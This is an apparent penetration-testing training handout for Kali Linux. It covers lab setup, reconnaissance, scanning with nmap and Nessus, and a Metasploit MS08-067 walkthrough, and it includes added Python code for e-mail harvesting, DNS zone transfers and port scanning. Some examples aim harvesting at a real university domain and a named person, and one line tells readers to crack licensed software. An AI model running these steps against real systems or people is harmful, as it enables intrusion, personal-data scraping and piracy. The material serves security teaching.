Network Security-Penetration Testing Using Kali Linux

Dec 29, 2015

jenniferespanol


Network Security: Penetration Testing Using KALI LINUX

Mr. Marlon I. Tayag, MIS Director
CISCO LMC, CCNA, CCAI
NC-II / NC-IV
Comptia NCP+
Fluke CTTA
Apple and Android Developer

TRAINING DESCRIPTION
This training is targeted toward Information Technology (IT) professionals who have networking and administrative skills in TCP/IP networks and familiarity with Windows and basic Linux commands, and who want to learn foundational network security topics by applying a penetration testing methodology with KALI Linux in a controlled laboratory environment.

How Security Evolved

What is Network Security?
Network security consists of the provisions and policies adopted by a network administrator to prevent and monitor unauthorized access, misuse, modification, or denial of a computer network and network-accessible resources. It involves the authorization of access to data in a network, which is controlled by the network administrator.

Why do we need security?
- Protect vital information while still allowing access to those who need it (trade secrets, medical records, etc.)
- Provide authentication and access control for resources

- Guarantee availability of resources (e.g. "five nines", 99.999% availability)

Security Facts
Two fundamental security facts:

- All complex software programs have flaws/bugs

- It is extraordinarily difficult to build hardware/software that is not vulnerable to attack

Who is vulnerable?
- Financial institutions and banks
- Internet service providers
- Pharmaceutical companies
- Government and defense agencies
- Contractors to various government agencies
- Multinational corporations
- ANYONE ON THE NETWORK

Who are the Attackers?
- Elite hackers: characterized by technical expertise and dogged persistence, not just a bag of tools
- Virus writers and releasers
- Script kiddies: limited but numerous
- Criminals: a rapidly growing group
- Employees, consultants, and contractors
- Cyberterrorism and cyberwar

Motivation for Hackers
- The challenge... because it's there!
- Ego
- Espionage
- Ideology
- Mischief
- Money (extortion or theft)
- Revenge

5 Categories of Hackers
- White-Hat
- Gray-Hat
- Black-Hat
- Script-Kiddie
- Hacktivist

Hackers are Everywhere
- Stealing data
- Industrial espionage
- Identity theft
- Defamation
- Deleting data for fun
- A lot of bored 16 year olds late at night
- Turning computers into zombies to commit crimes
- Take down networks
- Distribute porn
- Harass someone

Mafia Boy

Philker Hackers, responsible for the attacks on the PNRI, FDA and OVP websites.

Hacking Group

Onel de Guzman, the Philippine computer-college dropout who in May 2000 created and unleashed the remarkably dangerous ILOVEYOU virus (technically an e-mail worm), cost companies, governments, and citizens billions of US dollars in damages. In August of the same year, the charges against him in our country were dismissed, mainly because we had not yet passed legislation addressing the crimes he had committed. The public around the world was justifiably outraged.

The Case of the I Love You Virus

Types of Attacks
Attacks are classified as passive or active.

Passive attacks are eavesdropping:
- Release of message contents
- Traffic analysis
Passive attacks are hard to detect, so the aim is to prevent them.

Active attacks modify or fake data:
- Masquerade
- Replay
- Modification
- Denial of service

Goals of Security
- Prevention: prevent attackers from violating the security policy
- Detection: detect attackers' violations of the security policy
- Recovery: stop the attack, assess and repair the damage, and continue to function correctly even if the attack succeeds

"To protect yourself you have to know how your enemies think."

What is Penetration Testing
Penetration testing is the legal and authorized attempt to exploit a computer system with the intent of making the network or system more secure. The process includes scanning systems for weak spots and launching attacks to prove that the system is vulnerable to a real attacker.

Penetration Testing
- Takes an identified port and its associated service that contains vulnerabilities

- Uses an exploit to gain unauthorized access to the target system
- Tools include Metasploit, CANVAS, & Core IMPACT

Why Hack Yourself
Security assessments help organizations to:
- Understand threats for better defense
- Determine risk to make informed IT decisions
- Test incident handling procedures, intrusion detection systems, and other security implementations

Ethical Hacking
- Information Gathering
- Social Engineering
- Password Cracking (remote & local)
- War Dialing
- Wireless (WiFi, Bluetooth)
- VoIP, Blackberry, Smartphones, etc.

THE USE AND CREATION OF A HACKING LAB
Every ethical hacker must have a place to practice and explore. Most newcomers are confused about how they can learn to use hacking tools without breaking the law or attacking unauthorized targets. This is most often solved by building a personal hacking lab: a sandboxed environment where your traffic and attacks have no chance of escaping or reaching unauthorized and unintended targets. In practice that means an isolated (host-only or internal) virtual network with no bridge to the real LAN or the internet. In this environment you are free to explore all the various tools and techniques without fear that some traffic or attack will escape your network. Proper setup and use of a hacking lab is vital because one of the most effective ways to learn something is by doing it, and learning and mastering the basics of penetration testing is no different.

Hacking Lab Topology

Tools of the Trade: KALI Linux
Kali Linux is a distribution based on Debian GNU/Linux aimed at digital forensics and penetration testing. It is maintained and funded by Offensive Security, which developed it as the successor to BackTrack Linux.

"The quieter you become, the more you are able to hear." (the Kali Linux motto)

PC 1
User: Victim1   Password: 12345
DNS sub-domain name: victim1.petshop.com
IP Address: 192.168.1.3/24
Intranet services:
- Web Server: Apache Web Server
- Email Server: Kerio Mail Server
- Telnet
- FTP Server

PC 2
User: Victim2   Password: 12345
DNS sub-domain name: victim2.petshop.com
IP Address: 192.168.1.3/24 (as printed on the slide; two hosts cannot share one address on the same subnet, so give PC 2 its own unused host address in 192.168.1.0/24, distinct from Kali at 192.168.1.2 and PC 1 at 192.168.1.3)
Intranet services:
- DNS Server: Simple DNS
- Telnet
- FTP Server

Hardware: Web Cam

DNS Installation and Configuration
Install Simple DNS with zone transfer enabled.
Note: For educational purposes our copy of SDNS needs to be cracked in order to run.
Configure the domain names:
www.petshop.com
victim1.petshop.com
victim2.petshop.com
mail.petshop.com (for the MX record)

Note: Use Quick Records to configure the web, FTP and MX entries, and add a new A record for each of the remaining sub-domains.

Web Server Configuration
Install and test Apache Web Server.
From the work file directory copy all sample site files to the htdocs folder.
Test web browsing by using the configured domain name.

Email Configuration
Install a Kerio Mail Server trial copy.
Create the following e-mail (POP3) web mail accounts, with the default password of 12345:

[email protected]@petshop.com (the addresses are obfuscated in this transcript)

Note: Test e-mail by sending messages between the accounts.

FTP Server Configuration
Install FileZilla FTP Server on both victim PCs.
Create the following accounts:
PC1: Username: victim1   Password: 12345
PC2: Username: victim2   Password: 1234 (as printed; the other slides use 12345)
Test FTP connections by downloading and uploading files using the CLI.

Telnet Configuration
Activate the TELNET service on each victim PC.
Test Telnet connections.

Procedure:
1. Go to the command prompt
2. Type services.msc
3. Search for the Telnet service and activate it

KALI Linux Admin Account
User Name: root   Password: toor (the default on Kali releases of this era; since Kali 2020.1 the installer creates a non-root user with a password you choose)

Configure KALI Linux IP Address

Basic Linux Console Commands

To view IP settings: ifconfig
To configure an IP address on an interface: ifconfig eth0 192.168.1.2/24
Bring up an interface: ifconfig eth0 up
Bring down an interface: ifconfig eth0 down
Configure the interface via DHCP: dhclient eth0
Note: ifconfig comes from the net-tools package; on current Kali the iproute2 equivalents are ip addr (view), ip addr add 192.168.1.2/24 dev eth0, and ip link set eth0 up / down.


To configure the default gateway: route add default gw 192.168.1.1 (iproute2 equivalent: ip route add default via 192.168.1.1)
To configure the name server: echo nameserver 8.8.8.8 > /etc/resolv.conf (the single > overwrites the file; in the lab, point this at the Simple DNS server on PC 2 instead so the petshop.com names resolve)
Persistent configuration: vi /etc/network/interfaces

PHASES OF A PENETRATION TEST

Phase 1: Reconnaissance
This phase deals with gathering information about the target. The more information you collect on your target, the more likely you are to succeed.

"If I had six hours to chop down a tree, I'd spend the first four of them sharpening my axe."

In most cases people who attend hacking workshops or classes have a basic understanding of a few security tools. Typically, these students have used a port scanner to examine a system or maybe they have used Wireshark to examine network traffic. Some have even played around with exploit tools like Metasploit. Unfortunately, most beginners do not understand how these tools fit into the grand scheme of a penetration test. As a result, their knowledge is incomplete. Following a methodology ensures that you have a plan and know what to do next. To stress the importance of using and following a methodology, it is often beneficial to describe a scenario that helps demonstrate both the importance of this step and the value of following a complete methodology when conducting a penetration test.

Reconnaissance, also known as information gathering, is arguably the most important of the four phases we will discuss. The more time you spend collecting information on your target, the more likely you are to be successful in the later phases. Ironically, recon is also one of the most overlooked, underutilized, and misunderstood steps in penetration testing methodologies today.

When a site administrator submits a site to Google so that it can be found by search queries, Google's automated crawler (Googlebot) fetches the site's pages, files and code and stores copies on Google's cache servers. A cached page records the site name, the URL and the content that matched your query; that cached copy is what you see in the results page, and clicking a result sends you to the host server that actually serves the page. Because the crawler copies whatever it can reach, anything the site exposes by mistake ends up searchable too.

1.1 Google Hacking

Google hacking result categories:
1. Error messages: error messages contain rich data (file paths, software versions, query fragments) that can help gain access to the server.
2. Directory browsing: lets you navigate inside the directories that hold the hosted website.
3. File browsing: once a website directory is exposed, any document inside it is reachable, such as Word documents, Excel spreadsheets, Access databases, WS_FTP logs, and source code.
4. Network devices: printers, webcams and network routers whose web interfaces give the attacker a way to control the device.
5. Personal information gathering: searching with the @ symbol returns pages whose cached content contains e-mail addresses, which lets spammers mail all of them.

Google Directives
Directives are keywords that let a user extract precise information from the Google index.

Google Directives Hands-On
Go to Google.com
Type: nelson bulanadi hau.edu.ph

Google Directives
To properly use a Google directive, you need three things:
1. The name of the directive you want to use
2. A colon
3. The term you want to use in the directive

site:domain term(s) to search

Using the "index of" phrase to find sites with directory listing enabled
A web server with directory listing (index browsing) enabled lets anyone browse the server's directories like ordinary local directories. Such listings are titled "Index of /...", so the slide's indexof is the quoted phrase "index of", usually anchored to the page title with the intitle: directive:

site:domain intitle:"index of" /admin

Google is such a capable search engine that malicious users happily exploit it to dig up confidential and restricted information that has leaked onto the internet. The following techniques show how a malicious user digs up information using Google as a tool.

Google filetype: Directive
The filetype: directive restricts the search to a specific file extension. This is extremely useful for finding specific types of files on your target's website. For example, to return only hits that are PDF documents, you would issue the following query:
site:domainname filetype:pdf

1.2. Email Harvesting
Email harvesting is the process of obtaining lists of e-mail addresses by various methods, usually for bulk e-mail (spam). In a penetration test the same addresses become phishing targets and user names for password attacks.

theHarvester
A program used to gather e-mails, subdomains, hosts, employee names, open ports and banners from different public sources such as search engines, PGP key servers and the SHODAN computer database.

Usage:
root@kali:/usr/bin# theharvester -d hau.edu.ph -l 10 -b google
(-d = target domain, -l = limit on the number of results, -b = data source; on newer Kali releases the command is spelled theHarvester)
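What theHarvester does once it has fetched search results is plain text mining: pull every e-mail address and host name out of the pages and keep only those in the target's domain. The block below is an added example written for this page (it is not theHarvester's code); the three HTML snippets are constructed to stand in for pages a search engine or PGP key server might return for the lab domain petshop.com, and the names in them are invented.

```python
"""Harvest e-mail addresses and host names for one domain from saved pages.

Added example (not theHarvester's code). The pages are constructed sample
search results for the lab domain petshop.com; nothing here is a real site.
"""
import re
from html import unescape

# Constructed sample "search results" for the lab domain (assumption: this is what
# a search engine and a PGP key server would return). Not real pages or people.
SAMPLE_PAGES = [
    '<p>Contact <a href="mailto:sales@petshop.com">sales@petshop.com</a> or '
    'support&#64;petshop.com. Staff: J. Cruz &lt;jcruz@mail.petshop.com&gt;</p>',
    '<a href="https://www.petshop.com/about">About</a> '
    '<a href="http://ftp.petshop.com/pub/">Downloads</a> '
    '<a href="https://petshop.com.evil.example/">look-alike domain</a>',
    'PGP key for victim1@petshop.com ... webmaster@petshop.com ... noreply@otherdomain.com',
]

EMAIL_RE = re.compile(r"[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,}")
HOST_RE = re.compile(r"(?:[A-Za-z0-9-]+\.)+[A-Za-z]{2,}")


def in_scope(host, domain):
    """True for the domain itself and its subdomains; rejects look-alikes such as petshop.com.evil.example."""
    host, domain = host.lower(), domain.lower()
    return host == domain or host.endswith("." + domain)


def harvest(pages, domain):
    """Return (sorted e-mails, sorted hosts) found in the pages that belong to the target domain."""
    emails, hosts = set(), set()
    for page in pages:
        text = unescape(page)  # undo the &#64; / &lt; obfuscation sites use against scrapers
        for addr in EMAIL_RE.findall(text):
            host = addr.rpartition("@")[2]
            if in_scope(host, domain):
                emails.add(addr.lower())
                hosts.add(host.lower())  # an e-mail host is a host worth scanning too
        for host in HOST_RE.findall(text):
            if in_scope(host, domain):
                hosts.add(host.lower())
    return sorted(emails), sorted(hosts)


if __name__ == "__main__":
    found_emails, found_hosts = harvest(SAMPLE_PAGES, "petshop.com")
    print("emails:", *found_emails, sep="\n  ")
    print("hosts:", *found_hosts, sep="\n  ")
```

The in_scope() check is the part people get wrong: a naive "contains petshop.com" match would also accept petshop.com.evil.example and put an attacker-controlled host on your target list.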

msfconsole
The msfconsole is probably the most popular interface to the Metasploit Framework (MSF). It provides an "all-in-one" centralized console and gives efficient access to virtually all of the options available in the framework.

Usage:
Go to the root console and type msfconsole
msf > use auxiliary/gather/search_email_collector
msf auxiliary(search_email_collector) > set DOMAIN hau.edu.ph
msf auxiliary(search_email_collector) > run
(run is the command for auxiliary modules; exploit is accepted as an alias)

NSLookup
A network administration command-line tool available for many operating systems, used for querying the Domain Name System (DNS) to obtain the mapping between a domain name and an IP address, or any other specific DNS record.

Usage:
nslookup target_domain

WHOIS
A query and response protocol that is widely used for querying databases that store the registered users or assignees of an Internet resource, such as a domain name, an IP address block, or an autonomous system, but it is also used for a wider range of other information. For the Philippine .ph extension the whois domain registrant database is PH.NET.

Usage:
whois target_domain

Netcraft
Netcraft is an Internet services company based in Bath, England. Netcraft provides web server and web hosting market-share analysis, including web server and operating system detection.

Usage:
Open a web browser and go to http://news.netcraft.com
Type the domain on the

Dig
A more flexible replacement for nslookup when looking up domain information; it can also request a full zone transfer (AXFR), which a misconfigured name server will hand to anyone.

Usage:
dig @target_ip target_domain
dig @target_ip example.com -t AXFR
(the slide's "t AXFR" lost its dash; -t selects the record type. Try the transfer against every authoritative server listed in the zone's NS records, since often only one of them is misconfigured; "Transfer failed" means the server refused, which is the correct behaviour)
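To see what dig -t AXFR actually sends and receives, here is a minimal zone-transfer client added for this page (it is not part of the course material or of dig). It builds the AXFR query from the RFC 1035 wire format, streams the length-prefixed answers over TCP until the SOA record appears a second time, and decodes compressed names. constructed_axfr_response() is a hand-built reply from a leaky server for the lab zone petshop.com (victim1, victim2 and mail are the lab's names; the addresses are not real hosts) so the parser can be exercised offline.

```python
"""A minimal AXFR (zone transfer) client: what dig -t AXFR does on the wire (RFC 1035).

Added example, not part of the course or of dig. zone_transfer() talks to a real
server; constructed_axfr_response() is a hand-built reply for offline parsing.
"""
import socket
import struct

TYPE_NAMES = {1: "A", 2: "NS", 5: "CNAME", 6: "SOA", 15: "MX"}

def encode_name(name):
    """Wire-encode a domain name as length-prefixed labels ending in a zero byte."""
    labels = name.rstrip(".").split(".")
    return b"".join(bytes([len(l)]) + l.encode("ascii") for l in labels) + b"\x00"

def build_axfr_query(zone, txid=0x4B41):
    """Header (flags 0: plain query, no recursion) + one question of type AXFR (252), class IN (1)."""
    return struct.pack("!HHHHHH", txid, 0, 1, 0, 0, 0) + encode_name(zone) + struct.pack("!HH", 252, 1)

def read_name(msg, off):
    """Decode a name that may use compression pointers; returns (name, offset after the field)."""
    labels, end = [], None
    while True:
        length = msg[off]
        if length & 0xC0 == 0xC0:                      # pointer to an earlier copy of the suffix
            if end is None:
                end = off + 2
            off = struct.unpack("!H", msg[off:off + 2])[0] & 0x3FFF
            continue
        off += 1
        if length == 0:
            break
        labels.append(msg[off:off + length].decode("ascii"))
        off += length
    return ".".join(labels), (off if end is None else end)

def parse_message(msg):
    """Return (rcode, answer records as (owner, type, value)) for one DNS message."""
    _, flags, qd, an, _, _ = struct.unpack("!HHHHHH", msg[:12])
    off = 12
    for _ in range(qd):                                # skip the echoed question
        _, off = read_name(msg, off)
        off += 4
    records = []
    for _ in range(an):
        owner, off = read_name(msg, off)
        rtype, _, _, rdlen = struct.unpack("!HHIH", msg[off:off + 10])
        off += 10
        rd, off = off, off + rdlen
        if rtype == 1:
            value = socket.inet_ntoa(msg[rd:rd + 4])
        elif rtype in (2, 5, 6):                       # NS, CNAME, SOA: a name (for SOA, the MNAME)
            value, _ = read_name(msg, rd)
        elif rtype == 15:                              # MX: preference + exchange name
            value = f"{struct.unpack('!H', msg[rd:rd + 2])[0]} {read_name(msg, rd + 2)[0]}"
        else:
            value = msg[rd:rd + rdlen].hex()
        records.append((owner, TYPE_NAMES.get(rtype, str(rtype)), value))
    return flags & 0xF, records

def recv_exact(sock, n):
    buf = b""
    while len(buf) < n:
        chunk = sock.recv(n - len(buf))
        if not chunk:
            raise ConnectionError("server closed the connection mid-transfer")
        buf += chunk
    return buf

def zone_transfer(server, zone, port=53, timeout=5.0):
    """AXFR runs over TCP with 2-byte length prefixes; the zone ends when the SOA appears a second time.
    Returns (rcode, records). rcode 5 (REFUSED) is the healthy answer from a properly locked-down server."""
    query = build_axfr_query(zone)
    records, soa_seen = [], 0
    with socket.create_connection((server, port), timeout=timeout) as s:
        s.sendall(struct.pack("!H", len(query)) + query)
        while soa_seen < 2:
            size = struct.unpack("!H", recv_exact(s, 2))[0]
            rcode, recs = parse_message(recv_exact(s, size))
            if rcode != 0:
                return rcode, records
            records.extend(recs)
            soa_seen += sum(1 for r in recs if r[1] == "SOA")
    return 0, records

def rr(owner, rtype, rdata, ttl=3600):
    """Encode one resource record (class IN)."""
    return encode_name(owner) + struct.pack("!HHIH", rtype, 1, ttl, len(rdata)) + rdata

def constructed_axfr_response(zone="petshop.com"):
    """Constructed reply to build_axfr_query(zone) from a server that allows transfers (lab names, not real hosts)."""
    soa = rr(zone, 6, encode_name("victim2." + zone) + encode_name("admin." + zone)
             + struct.pack("!IIIII", 1, 3600, 600, 86400, 300))
    answers = [soa,
               rr(zone, 2, encode_name("victim2." + zone)),
               rr("www." + zone, 1, socket.inet_aton("192.168.1.3")),
               rr("victim1." + zone, 1, socket.inet_aton("192.168.1.3")),
               rr(zone, 15, struct.pack("!H", 10) + encode_name("mail." + zone)),
               rr("mail." + zone, 5, b"\xC0\x0C"),     # CNAME given as a pointer to offset 12 = the question name
               soa]
    header = struct.pack("!HHHHHH", 0x4B41, 0x8400, 1, len(answers), 0, 0)   # QR=1, AA=1, NOERROR
    return header + encode_name(zone) + struct.pack("!HH", 252, 1) + b"".join(answers)

if __name__ == "__main__":
    for owner, rtype, value in parse_message(constructed_axfr_response())[1]:
        print(f"{owner:24s} {rtype:6s} {value}")
```

Against the lab, zone_transfer("192.168.1.x_of_PC2", "petshop.com") lists every host the Simple DNS server knows about in one request, which is why zone transfers should be restricted to secondary servers only.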

Phase 2: Scanning
Scanning turns the results of reconnaissance (domains, hosts, address ranges) into a concrete list of live hosts, open ports, running services and known vulnerabilities. The same techniques have defensive uses (inventorying a network and monitoring its devices), and scanning may also be run from outside a network to identify potential exposures.

Scanning Process Steps
1. Determining if a system is alive
2. Port scanning the system
3. Scanning the system for vulnerabilities

Step 1: Determine whether the target system is alive
This is the process of determining whether a target system is turned on and capable of communicating with our machine. It is the least reliable step (hosts and firewalls commonly drop ping probes), so always continue with steps 2 and 3 regardless of the outcome. It is still worth doing: note every machine that responds as alive.

Step 2: Identifying ports
This is the process of identifying the specific ports and services running on a particular host. A port is a 16-bit number (0 to 65535) that, together with the IP address and protocol (TCP or UDP), identifies one communication endpoint on a host. A listening port is where a service accepts connections, so the set of open ports tells you which services a host exposes.

Step 3: Vulnerability ScanningVulnerability scanning is the process of locating and identifying known weaknesses in the services and software running on a target machine. The discovery of known vulnerabilities on a target system can be like finding the pot of gold at the end of a rainbow. Many systems today can be exploited directly with little or no skill when a machine is discovered to have a known vulnerability.

2.1 Pings and Ping Sweeps
A ping is a special type of network packet called an ICMP packet. Pings work by sending a specific type of network traffic, ICMP Echo Request packets, to a specific interface on a computer or network device. If the device (and its attached network card) that received the ping packet is turned on and not restricted from responding, it will reply to the originating machine with an ICMP Echo Reply packet.

Ping Sweep
A ping sweep is a series of pings sent automatically to a range of IP addresses, rather than entering each target's address by hand.

fping
A program that sends ICMP echo probes to network hosts, similar to ping, but with much better performance when pinging multiple hosts.

Usage:
fping -a target_ip
fping -a -g target_ip_beginning target_ip_end > file

Example:
fping -a 172.16.41.172
fping -a -g 172.16.41.1 172.16.41.190 > host.txt

-a = show only live (alive) hosts
-g = generate the target list from an IP range

Port Scanning
The act of systematically scanning a computer's ports. Since a port is a place where information goes into and out of a computer, port scanning identifies the open doors into a computer. Port scanning has legitimate uses in managing networks, but it can also be malicious if someone is looking for a weak access point to break into your computer.

Three-Way Handshake
When two machines on a network want to communicate using TCP, they first complete the three-way handshake. The first computer connects to the second by sending a SYN packet to a specified port number. If the second computer is listening on that port, it responds with a SYN/ACK. When the first computer receives the SYN/ACK, it replies with an ACK packet. At this point the connection is established and the two machines can exchange data normally. A port with nothing listening answers the SYN with a RST instead, and a firewall that drops the SYN produces no answer at all; port scanners classify ports by exactly these three outcomes.

Nmap
Nmap is a security scanner used to discover hosts and services on a computer network, thus creating a "map" of the network. To accomplish its goal, Nmap sends specially crafted packets to the target host and then analyses the responses.

NMAP Basics
Nmap reports six port states: open, closed, filtered, unfiltered, open|filtered, and closed|filtered.

Open: the port actively accepted the connection (or UDP packet) we sent to it; a service is listening.

Closed: the host is up and answered (TCP RST or ICMP port unreachable), but no service is listening on that port. Closed ports prove the host is reachable, and the fact that the probe got through shows that no firewall is filtering them, which is itself a reason to firewall them.

Filtered: Nmap could not reach the port because a firewall or routing rule dropped the probe; no response came back.

Unfiltered: the port is accessible but Nmap could not tell whether it is open or closed (only the ACK scan produces this state).

open|filtered: Nmap cannot distinguish open from filtered, typically in UDP scans, where silence means either a service that ignores the probe or a firewall.

closed|filtered: Nmap cannot distinguish closed from filtered; only the IP ID idle scan produces this state.

Using Nmap to Perform a TCP Connect ScanThis scan is often considered the most basic and stable of all the port scans because Nmap attempts to complete the three-way handshake on each port specified in the Nmap command.

Usage:
TCP Connect Scan: nmap -sT -p- -PN 172.16.45.135
TCP IP Range Scan: nmap -sT -p- -PN 172.16.45.1-254
Host OS Discovery: nmap -sS -P0 -sV -O 192.168.1.1

-sT = TCP connect scan (-s selects the scan type, T = connect; -sS is the SYN "half-open" scan, which needs root)
-p- = scan all 65535 ports
-PN / -P0 = skip the host discovery (ping) phase and treat every address as alive; current Nmap spells this -Pn
-sV = probe open ports for service/version, -O = operating system detection

Using Nmap to Perform UDP ScansUDP is an acronym for User Datagram Protocol. UDP is said to be connectionless because the sender simply sends packets to the receiver with no mechanism for ensuring that the packets arrive at the destination. It is important to remember that not every service utilizes TCP.

Usage:
nmap -sU 172.16.45.129
(UDP scans are slow, because a silent port has to time out before it is reported as open|filtered)

Vulnerability Scanning
A vulnerability is a weakness in the software or system configuration that can be exploited. Vulnerabilities come in many forms, but most often they are associated with missing patches.
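The TCP connect scan and the UDP scan above differ only in what evidence the scanner can collect, and that is easiest to see by writing the probes yourself. The block below is an added example for this page (not nmap's code): it completes the three-way handshake per TCP port the way -sT does, maps the three outcomes (connected, RST, silence) to open/closed/filtered, and sends a UDP datagram the way -sU does, where only a reply or an ICMP port-unreachable is conclusive and silence has to be reported as open|filtered. To run offline it starts its own listeners on 127.0.0.1 (an assumption of the example; in the lab you would point it at the victim PCs).

```python
"""Hand-rolled TCP connect and UDP probes showing how nmap -sT / -sU decide port state.

Added example, not nmap's code. demo() runs against listeners it starts itself
on 127.0.0.1 so the result is reproducible offline.
"""
import errno
import socket
import threading


def tcp_connect_scan(host, ports, timeout=1.0):
    """Full three-way handshake per port, exactly what -sT does (noisy: the service logs a connection)."""
    states = {}
    for port in ports:
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.settimeout(timeout)
        try:
            s.connect((host, port))            # SYN -> SYN/ACK -> ACK completed
            states[port] = "open"
        except socket.timeout:                 # SYN silently dropped: a firewall is in the way
            states[port] = "filtered"
        except ConnectionRefusedError:         # RST came back: host up, nothing listening
            states[port] = "closed"
        except OSError as e:                   # no route / host unreachable: nmap also calls this filtered
            states[port] = "filtered" if e.errno in (errno.EHOSTUNREACH, errno.ENETUNREACH) else "error"
        finally:
            s.close()
    return states


def udp_probe(host, port, timeout=1.0, payload=b"\x00"):
    """No handshake in UDP, so only a reply or an ICMP port-unreachable is hard evidence."""
    s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    s.settimeout(timeout)
    try:
        s.connect((host, port))                # connected UDP socket: ICMP errors surface as exceptions
        s.send(payload)
        s.recv(1024)
        return "open"                          # the service answered
    except ConnectionRefusedError:
        return "closed"                        # ICMP type 3 code 3 (port unreachable) came back
    except socket.timeout:
        return "open|filtered"                 # silence: a service ignoring junk, or a firewall
    finally:
        s.close()


def start_tcp_listener(host="127.0.0.1"):
    """Bind an ephemeral TCP port and accept (then drop) connections in the background."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.bind((host, 0))
    srv.listen(5)

    def serve():
        try:
            while True:
                conn, _ = srv.accept()
                conn.close()
        except OSError:
            pass

    threading.Thread(target=serve, daemon=True).start()
    return srv, srv.getsockname()[1]


def start_udp_echo_listener(host="127.0.0.1"):
    """Bind an ephemeral UDP port and echo whatever arrives, like a chatty UDP service."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    srv.bind((host, 0))

    def serve():
        try:
            while True:
                data, peer = srv.recvfrom(1024)
                srv.sendto(data, peer)
        except OSError:
            pass

    threading.Thread(target=serve, daemon=True).start()
    return srv, srv.getsockname()[1]


def free_port(kind, host="127.0.0.1"):
    """Reserve then release an ephemeral port, giving us a port that is definitely closed."""
    s = socket.socket(socket.AF_INET, kind)
    s.bind((host, 0))
    port = s.getsockname()[1]
    s.close()
    return port


def demo(host="127.0.0.1"):
    """Scan one open and one closed port of each protocol; returns the observed states."""
    tcp_srv, tcp_open = start_tcp_listener(host)
    udp_srv, udp_open = start_udp_echo_listener(host)
    tcp_closed = free_port(socket.SOCK_STREAM, host)
    udp_closed = free_port(socket.SOCK_DGRAM, host)
    tcp = tcp_connect_scan(host, [tcp_open, tcp_closed])
    result = {
        "tcp_open": tcp[tcp_open],
        "tcp_closed": tcp[tcp_closed],
        "udp_open": udp_probe(host, udp_open),
        "udp_closed": udp_probe(host, udp_closed),
    }
    tcp_srv.close()
    udp_srv.close()
    return result


if __name__ == "__main__":
    for name, state in demo().items():
        print(f"{name:11s} {state}")
```

Two things worth noticing: a filtered verdict costs a full timeout per port, which is why scanning all 65535 ports through a firewall takes so long, and the UDP "closed" verdict depends on the target sending ICMP port-unreachable; a host that rate-limits or blocks ICMP turns every closed UDP port into open|filtered.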

Nessus
Nessus is a proprietary, comprehensive vulnerability scanner developed by Tenable Network Security. It is free of charge for personal use in a non-enterprise environment (the Home edition). Its goal is to detect potential vulnerabilities on the tested systems.

Installing Nessus
To install Nessus, complete the following steps:
1. Download the installer from www.nessus.org.
2. Register for a key on the Nessus website by submitting your e-mail address.
3. The Nessus crew will e-mail you a unique product key that can be used to register the product.
4. Install the program.
5. Create a Nessus user to access the system.
6. Update the plug-ins.

Using Nessus
To run Nessus, open a browser and go to https://kali:8834 (Nessus listens on TCP port 8834; if the name kali does not resolve, use https://127.0.0.1:8834 and accept the self-signed certificate).
Username: admin   Password: adminkali (the lab account created during installation)
Create new scans and scan.
After the scan finishes, click Results.

Troubleshooting Nessus
If Nessus is not reachable from the browser, start the Nessus service by typing the command

service nessusd start
or
/etc/init.d/nessusd start

Sample Vulnerability Results

Critical Issues Found On The System

Phase 3: Exploitation
Exploitation is the process of gaining control over a system. This process can take many different forms, but the end goal always remains the same: administrative-level access to the computer. Exploitation is the attempt to turn the target machine into a puppet that will execute your commands and do your bidding. Just to be clear, exploitation is the process of launching an exploit. A vulnerability is an issue or bug in the software code (or its configuration); an exploit is the code an attacker uses to take advantage of that bug and alter the original functionality of the software, usually to run code of the attacker's choosing.

Metasploit: Hacking Swordfish Style
The Metasploit Project is a computer security project which provides information about security vulnerabilities and aids in penetration testing and IDS signature development.

In 2004, at Defcon 12, HD Moore and spoonm rocked the world when they gave a talk titled "Metasploit: Hacking Like in the Movies". This presentation focused on exploit frameworks. An exploit framework is a formal structure for developing and launching exploits. Frameworks assist the development process by providing organization and guidelines for how the various pieces are assembled and interact with each other.

Using Metasploit
To run Metasploit:
Go to the root console
Type msfconsole
Note: Starting msfconsole takes between 10 and 30 seconds, so do not panic if nothing happens for a few moments.

To update Metasploit (two ways on the Kali of that time):
- On the root console type msfupdate, or
- Inside msfconsole, after the msf > prompt, type msfupdate
Note: current Kali releases no longer ship msfupdate; update the package instead with apt update && apt install metasploit-framework.

In order to use Metasploit a target must be identified, an exploit must be selected, a payload needs to be picked, and the exploit itself must be launched.

Metasploit Terminology
Exploit: a pre-packaged piece of code that is sent to a remote system to trigger a specific weakness in it; that weakness is what allows the attacker to execute remote code (the payload) on the target system.

Payload: a small snippet of code used to perform some task once the exploit has succeeded, such as installing new software, creating new users, or opening a backdoor (a shell) on the system. It is the software or functionality that ends up running on the target.

Using Nessus Output To Attack a System With Metasploit
Recall that Nessus is a vulnerability scanner and provides us with a list of known weaknesses or missing patches. When reviewing the Nessus output, make notes of all findings but pay special attention to the vulnerabilities labeled High or Critical. Many High or Critical Nessus findings, especially missing Microsoft patches, correlate directly with Metasploit exploits; the Nessus finding usually names the Microsoft bulletin (e.g. MS08-067), which is the term to search for in msfconsole.

Sample Vulnerability Results

Critical Issues Found On The System

Exploiting Vulnerabilities
Inside msfconsole, look for exploits pertaining to the vulnerabilities found:

msf > search ms08-067

Note: If you see "[!] Database not connected or cache not built, using slow search", exit msfconsole by typing exit. On the root console type service postgresql start (on Kali, msfdb init starts the database and creates the msf database and user for you), then return to msfconsole and repeat the search.

It is important to pay close attention to the exploit rank. This information provides details about how dependable the exploit is (how often the exploit is successful) as well as how likely the exploit is to cause instability or crashes on the target system.

Metasploit uses seven ratings to rank each exploit, from least to most reliable:
1. Manual
2. Low
3. Average
4. Normal
5. Good
6. Great
7. Excellent

Using The Exploit
To use the exploit:
msf > use exploit/windows/smb/ms08_067_netapi
To list the compatible payloads:
msf exploit(ms08_067_netapi) > show payloads
Select a payload:
msf exploit(ms08_067_netapi) > set payload windows/vncinject/bind_tcp

Show the options of the exploit and payload:
msf exploit(ms08_067_netapi) > show options

Setting the options
msf exploit(ms08_067_netapi) > set RHOST 192.168.138.134
(RHOST = target IP)
msf exploit(ms08_067_netapi) > set LHOST 192.168.138.135
(LHOST = local, i.e. attacker, IP. It is used by reverse payloads, which connect back to it; the bind_tcp payload chosen above listens on the target instead, so for it only RHOST and LPORT matter.)

Run the exploit:
msf exploit(ms08_067_netapi) > exploit

